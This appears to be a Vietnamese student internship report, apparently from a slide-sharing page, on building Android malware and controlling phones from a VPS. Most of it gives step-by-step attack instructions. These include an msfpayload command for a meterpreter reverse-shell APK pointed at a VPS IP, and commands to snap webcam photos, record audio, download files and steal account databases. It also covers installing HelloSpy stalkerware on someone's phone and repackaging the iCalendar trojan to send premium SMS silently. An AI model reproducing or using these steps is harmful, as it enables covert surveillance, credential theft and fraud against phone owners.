BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 

Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc

  • 1. GVHD : VÕ ĐỖ THẮNG August 28, 2014 BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG SINH VIÊN THỰC HIỆN: NGUYỄN XUÂN NGỌC Tạo mã độc trên VPS để xâm nhập Android (28/08/2014) Trang 1
  • 2. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 2 Nội dung: 1. Tên đề tài: Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài. 2. Yêu cầu:  Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có internet) 2.1 Cài đặt autosploit trên VPS 2.2 Tạo mã độc trên VPS 2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các android về VPS
  • 3. GVHD : VÕ ĐỖ THẮNG August 28, 2014 II/ THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET 1/ Cài mã độc trên VPS 1.1/ Cài đặt Metasploit lên VPS Trang 3 a/ Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. b/ Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu. Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
  • 4. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Chọn server và ngày hết hạn, để mặc định: Trang 4
  • 5. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 5 Quá trình cài đặt của Metasploit: Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
  • 6. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Sau khi Finish trình duyệt web mở lên và đi tới giao diện Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account: Trang 6
  • 7. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 2/ Từ VPS điều khiển thiết bị qua internet Trang 7 Các bước thực hiện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132
  • 8. GVHD : VÕ ĐỖ THẮNG August 28, 2014 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS Trang 8
  • 9. GVHD : VÕ ĐỖ THẮNG August 28, 2014 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị Trang 9 hack
  • 10. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Để xem thông tin về máy, nhập lệnh SysInfo • Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở Trang 10 danh sách camera ở phần trước. • Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 11. GVHD : VÕ ĐỖ THẮNG August 28, 2014 • Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download madoc.apk Trang 11
  • 12. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Một số lệnh khác : để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Trang 12
  • 13. GVHD : VÕ ĐỖ THẮNG August 28, 2014 để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db Trang 13 3/ Ứng dụng HelloSpy 3.1. Tải về và cài đặt HelloSpy HelloSpy có nhiều tính năng theo dõi như: o Theo dõi vị trí thiết bị o Lịch sử vị trí trong vòng 24 giờ o Theo dõi tin nhắn o Theo dõi danh bạ o Theo dõi nhật kí cuộc gọi o Lịch sử URL, lịch sử hình ảnh, lịch sử ứng dụng… Android 2.x: HelloSpy.com/downloads/hellotarget2.apk Android 4.x: HelloSpy.com/downloads/hellotarget4.apk Các bạn mở trình duyệt internet trên điện thoại và tải 1 trong 2 phiên bản trên .
  • 14. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Sau khi việc tải đã hoàn tất, các bạn tiến hành cài đặt như các phần mềm khác . Trang 14 2. Sử dụng sau khi việc tải và cài đặt xong, các bạn phải khởi động lại máy , sau đó các bạn gọi số : “ #8888* “ để gọi phần mềm HelloSpy Nếu bạn là người mới sử dụng , các bạn tiến hành các thao tác đăng kí User . và bước cuối cùng là Log In tài khoản các bạn vừa tạo
  • 15. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Tại đây, ta đăng nhập với tài khoản email đã đăng kí, sau đó khởi động lại máy. Từ bây giờ chỉ cần điện thoại được kết nối mạng là ta có thể biết được người dùng đã nhắn tin, gọi điện hay thậm chí biết cả vị trí của họ mà chỉ cần vào đăng nhập vào tài khoản đã nhập trong điện thoại của họ trên trang chủ của HelloSpy. 4/ Cài đặt chương trình tích hợp mã độc (Trojan) trên Android 4.1/ Giới thiệu iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do. Trang 15 4.2/ Công cụ : a/ Java JDK Java là một công nghệ xây dựng các ứng dụng phần mềm. Nó được coi là công nghệ mang tính cách mạng và khả thi nhất trong việc tạo ra các ứng dụng có khả năng chạy thống nhất trên nhiều nền tảng mà chỉ cần biên dịch một lần. Java còn là một nền tảng phát triển và triển khai ứng dụng trong đó máy ảo Java, bộ thông dịch có vai trò trung tâm. Chúng ta có thể tải Java JDK về tại: http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html Tại đây, ta chỉ việc ấn vào Accept LicenseAgreement rồi chọn phiên bản để tải về.
  • 16. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 16 b./ Android SDK Android SDK là một máy ảo của Android trên PC. Android SDK giúp hỗ trợ lập trình các ứng dụng của Android trên PC, hỗ trợ bạn những chức năng không khác gì một chiếc máy thật. Ta có thể tải Android SDK tại: http://developer.android.com/sdk/index.html
  • 17. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Đầu tiên, ta sẽ giải nén thư mục vừa tải về. Sau đó vào eclipse.exe trong thư mục eclipse. Kế tiếp ta vào Windows -> Android SDK Manager sau đó bạn chọn phiên bản Android Trang 17 muốn tải về, sau đó ta ấn Install ….
  • 18. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Sau khi tải xong, ta vào Windows -> Android Virtual Device Manager và tạo một smartphone hệ điều hành Android theo ý thích. Sau đó ta ấn Start và một smartphone ảo với hệ điều hành Adroid đã lựa chọn sẽ hiện ra. Trang 18
  • 19. GVHD : VÕ ĐỖ THẮNG August 28, 2014 c/ Apktool Apktool là công cụ dùng để giải mã các file apk và jar, phục vụ cho việc tùy chỉnh, sửa đổi Trang 19 các file đó. Ta có thể tải về tại: https://code.google.com/p/android-apktool/ 4.3/ Hướng dẫn cài đặt Trojan iCalendar trên Android SDK Trước tiên, ta copy file iCalendar.apk vào thư mục apktool và mở CMD rồi di chuyển vào thư mục apktool. Kế tiếp ta giải mã iCalendar bằng lệnh : Apktool if iCalendar.apk Apktool d iCalendar.apk
  • 20. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Vậy là ta đã tạo được thư mục giải mã iCalendar ta vào thư mục đó rồi vào smali ->com - Trang 20 > mj -> iCalendar. Tại đây, ta mở file iCalendar.smali rồi sử số trong dấu ngoặc kép của line 252 thành số điện thoại sẽ nhận tin nhắn và nội dung tin nhắn sẽ gửi tại local v1 ngay dưới đó.
  • 21. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Ta làm tương tự với smsReceive.smali tại line 41. Bây giờ ta sẽ biên soạn lại iCalendar bằng lệnh: Trang 21 Apktool b iCalendar Vậy là trong thư mục dist của iCalendar đã có một file iCalendar.apk dã được biên soạn lại. Kế tiếp ta sẽ copy file iCalendar.apk vừa tạo vào thư mục cài đặt Java JDK để signing cho nó. Sau khi di chuyển vào thư mục Java JDK, ta dùng lệnh: keytool –genkey –v –keystore iCalendar.keystore –alias iCalendar –keyalg RSA –keysize 2048 –validity 10000
  • 22. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Sau đó ta sẽ nhập password và điền một số thông tin tùy ý: Trang 22 Sau đó ta dùng lệnh: Jarsigner –verbose –keystore iCalendar.keystore iCalendar.apk iCalendar Jarsigner –verify –verbose –certs iCalendar.apk Bây giờ ta copy file iCalendar.apk trong Java JDK vào thư mục sdk của Android SDK và
  • 23. GVHD : VÕ ĐỖ THẮNG August 28, 2014 tiến hành cài chương trình vào máy ảo ( máy ảo phải mở sẵn) : Adb –s emulator-5558 install iCalendar.apk Với 5558 là số điện thoại của máy cài và iCalendar.apk là tên chương trình. Vậy là bây giờ trong máy ảo đã có chương trình iCalend Trang 23
  • 24. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Chỉ cần mở iCalendar lên và ấn vài lần vào màn hình là đã có một tin nhắn được gửi đi mà người sử dụng không hề hay biết ,việc này sẽ làm mất đi tiền trong tài khoản sim của bạn, Trang 24
  • 25. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 25 II – NGUỒN THAM KHẢO https://code.google.com/p/dex2jar/ https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 0.3.3.windows.zip& http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao- dien-cuc-manh.12/